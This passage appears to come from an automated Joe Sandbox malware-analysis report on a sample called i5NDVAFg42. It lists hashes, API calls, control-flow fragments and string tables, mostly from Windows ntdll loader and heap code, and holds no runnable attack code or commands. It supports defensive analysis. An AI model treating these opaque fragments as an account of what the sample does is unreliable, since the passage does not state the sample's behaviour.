                                                              • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                              • Instruction Fuzzy Hash: 0201A731A8022C7BE721A6959C43FFE776C5B40F51F050115FF04BA1C1EAD47A0556F6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 270 cfa7c2-cfa7ea call cfaf60 272 cfa7ef-cfa804 LookupPrivilegeValueW 270->272
                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,00CEF1D2,00CEF1D2,0000003C,00000000,?,00CE9D65), ref: 00CFA800
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
                                                              • Opcode ID: c2bf0afcd6b210e6050da096542cf81bb09f150e42e767c5e43b5e2650d02e06
                                                              • Instruction ID: f44d9374c498e1a134a9c70acea9defe38fb18d2d2a0397f3481b73fd9b83c03
                                                              • Opcode Fuzzy Hash: c2bf0afcd6b210e6050da096542cf81bb09f150e42e767c5e43b5e2650d02e06
                                                              • Instruction Fuzzy Hash: 89F0E5B5200259AFC710DF48CC84FD7B768DF84640F108194FE0C5B252C630A811C7F1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 273 cfa66a-cfa687 call cfaf60 275 cfa68c-cfa6a1 RtlFreeHeap 273->275
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000060,00CE9CF3,?,?,00CE9CF3,00000060,00000000,00000000,?,?,00CE9CF3,?,00000000), ref: 00CFA69D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: 0f6725eb35f52b3fdc17333689a778d032c8229e468558adea3ffab8edd294ea
                                                              • Instruction ID: f78b021df705786f86a395b9c142145af19c1749aa1da41f3a7b49b00dc7b1fd
                                                              • Opcode Fuzzy Hash: 0f6725eb35f52b3fdc17333689a778d032c8229e468558adea3ffab8edd294ea
                                                              • Instruction Fuzzy Hash: 17E04FB52002046FD714DF98CC84EEB77AAEF88350F118555FA1C9B352C631E910CBB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 279 cfa670-cfa686 280 cfa68c-cfa6a1 RtlFreeHeap 279->280 281 cfa687 call cfaf60 279->281 281->280
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000060,00CE9CF3,?,?,00CE9CF3,00000060,00000000,00000000,?,?,00CE9CF3,?,00000000), ref: 00CFA69D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                              • Instruction ID: 344216baa69a47b1d9ff4853f3ee833026f600d9cb7e0fbd6635b5de50173e74
                                                              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                              • Instruction Fuzzy Hash: 01E012B1200208ABDB18EF99CC49EA777ACEF88750F118558BA085B252C630E9108AB1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 276 cfa630-cfa661 call cfaf60 RtlAllocateHeap
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00CF4536,?,00CF4CAF,00CF4CAF,?,00CF4536,?,?,?,?,?,00000000,00CE9CF3,?), ref: 00CFA65D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                              • Instruction ID: ba9f6a77d4c41165e6b14d59c8a237e50f07120b7850e6a506fd611740efc549
                                                              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                              • Instruction Fuzzy Hash: FFE012B1200208ABDB14EF99CC41EA777ACEF88654F118558BA085B242C630F9108AB1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,00CEF1D2,00CEF1D2,0000003C,00000000,?,00CE9D65), ref: 00CFA800
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
                                                              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                              • Instruction ID: 8a6b1964a594eef3cb96d5cab121aa1741e1e4c3e3525fd35bb785d88c02eb44
                                                              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                              • Instruction Fuzzy Hash: A9E01AB12002086BDB10DF89CC85EE777ADEF88650F118154BA0C5B241C930E8108BF5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00CFA6D8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0
                                                              • Opcode ID: bdf861d4c4c428965906b4d703dc43911d27af3f5feaa706c1122f1b340ec4e5
                                                              • Instruction ID: d5a7c223cdc9289cc6949d16027f7b462c8749b0a7bac1e4603e65904b28d7b1
                                                              • Opcode Fuzzy Hash: bdf861d4c4c428965906b4d703dc43911d27af3f5feaa706c1122f1b340ec4e5
                                                              • Instruction Fuzzy Hash: 48E08671644244BBD720DB58CC84ED37F66DF55240F19C159BA4EAB751C930D901C7A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00CFA6D8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0
                                                              • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                              • Instruction ID: cb2d79f9527e1d92ce071704f3a9425baf19e5e727b88bf3784fe5ad048233a0
                                                              • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                              • Instruction Fuzzy Hash: B9D012716002187BD620DB98CC85FD777ACDF48750F118065BA1C5B241C531BA0086E1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 5a46c9d038f7bae6bb0e4cb440c6694b35962461c4882f32078c457bdc23ed93
                                                              • Instruction ID: 791e242b2d8a26b1bdefd92cfa5e5927cd533114fa27ab0d4880fa283195f9a4
                                                              • Opcode Fuzzy Hash: 5a46c9d038f7bae6bb0e4cb440c6694b35962461c4882f32078c457bdc23ed93
                                                              • Instruction Fuzzy Hash: 9CB09B719055D5C5DB11E7644608717B91077D0701F15C075D2030651F4738C1D1E277
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2160512332
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-3089669407
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0182635D
                                                              • @, xrefs: 0182647A
                                                              • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 01825FE1
                                                              • @, xrefs: 018263A0
                                                              • PreferredUILanguagesPending, xrefs: 018261D2
                                                              • @, xrefs: 018261B0
                                                              • @, xrefs: 01826277
                                                              • Control Panel\Desktop, xrefs: 0182615E
                                                              • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 01825A84
                                                              • @, xrefs: 01826027
                                                              • LanguageConfiguration, xrefs: 01826420
                                                              • LanguageConfigurationPending, xrefs: 01826221
                                                              • InstallLanguageFallback, xrefs: 01826050
                                                              • PreferredUILanguages, xrefs: 018263D1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                              • API String ID: 0-1325123933
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • Critical section address, xrefs: 017F5425, 017F54BC, 017F5534
                                                              • undeleted critical section in freed memory, xrefs: 017F542B
                                                              • Thread identifier, xrefs: 017F553A
                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017F54E2
                                                              • double initialized or corrupted critical section, xrefs: 017F5508
                                                              • corrupted critical section, xrefs: 017F54C2
                                                              • Critical section address., xrefs: 017F5502
                                                              • Critical section debug info address, xrefs: 017F541F, 017F552E
                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017F54CE
                                                              • 8, xrefs: 017F52E3
                                                              • Invalid debug info address of this critical section, xrefs: 017F54B6
                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 017F5543
                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017F540A, 017F5496, 017F5519
                                                              • Address of the debug info found in the active list., xrefs: 017F54AE, 017F54FA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                              • API String ID: 0-2368682639
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017F22E4
                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 017F261F
                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 017F2624
                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 017F2498
                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 017F2602
                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017F24C0
                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017F25EB
                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 017F2506
                                                              • @, xrefs: 017F259B
                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 017F2412
                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 017F2409
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                              • API String ID: 0-4009184096
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                              • API String ID: 0-360209818
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                              • API String ID: 0-2515994595
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                              • API String ID: 0-3591852110
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                              • API String ID: 0-3197712848
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                              • API String ID: 0-3532704233
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                              • API String ID: 0-1357697941
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                              • API String ID: 0-1700792311
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01808A3D
                                                              • VerifierDlls, xrefs: 01808CBD
                                                              • HandleTraces, xrefs: 01808C8F
                                                              • AVRF: -*- final list of providers -*- , xrefs: 01808B8F
                                                              • VerifierDebug, xrefs: 01808CA5
                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01808A67
                                                              • VerifierFlags, xrefs: 01808C50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                              • API String ID: 0-3223716464
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                              • API String ID: 0-1109411897
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-523794902
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                              • API String ID: 0-4098886588
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                              • API String ID: 0-122214566
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-792281065
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017D99ED
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 017D9A11, 017D9A3A
                                                              • apphelp.dll, xrefs: 01776496
                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 017D9A2A
                                                              • LdrpInitShimEngine, xrefs: 017D99F4, 017D9A07, 017D9A30
                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 017D9A01
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-204845295
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • SXS: %s() passed the empty activation context, xrefs: 017F2165
